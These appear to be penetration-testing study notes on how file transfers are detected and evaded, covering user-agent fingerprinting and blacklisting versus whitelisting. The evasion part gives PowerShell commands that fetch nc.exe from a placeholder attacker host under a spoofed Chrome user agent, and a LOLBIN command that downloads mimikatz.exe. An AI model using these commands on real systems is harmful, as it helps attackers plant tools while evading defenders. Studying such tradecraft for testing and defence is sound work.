8 - Detection & Evading Detection

# Detection - command-line detection based on blacklisting can be easy to bypass with obfuscation techniques - command-line detection based on whitelisting is much harder to bypass - malicious file transfers can be recognized based on user agent strings - HTTP clients can be recognized by their user agent string - examples: firefox, chrome, sqlmap, nmap, curl - tool for user agent string identification: [UserAgentString.com - Chrome version 140.0.0.0](https://useragentstring.com/index.php - list of user agent strings: [UserAgentString.com - List of User Agent Strings](https://useragentstring.com/pages/useragentstring.php) ``` #example user agent strings shown from server perspective User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0 #Invoke-WebRequest client User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) #WinHttpRequest client User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E) #Msxml2 client User-Agent: Microsoft-CryptoAPI/10.0 #CertUtil client User-Agent: Microsoft BITS/7.8 #BITS client ``` # Evading Detection - some administrators or defenders may blacklist user agents - however, as one example, `Invoke-WebRequest` contains a UserAgent parameter, which allows for changing the default user agent to one emulating IE, Firefox, Chrome, Opera, or Safari ```powershell [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl #list user agents ``` ```powershell #Invoking Invoke-WebRequest to download nc.exe using a Chrome User Agent $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome Invoke-WebRequest http://<kali_host_ip>/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe" ``` ## LOLBAS / GTFOBins - Application whitelisting may prevent you from using PowerShell or Netcat, and command-line logging may alert defenders to your presence - Here one option may be to use a "LOLBIN" (living off the land binary) aka "misplaced trust binaries" - Example LOLBIN: `GfxDownloadWrapper.exe` (Intel Graphics Driver for Windows 10), which is installed on some systems to download configuration files periodically ```powershell GfxDownloadWrapper.exe "http://<kali_host_ip>/mimikatz.exe" "C:\Windows\Temp\mimikatz.exe" ```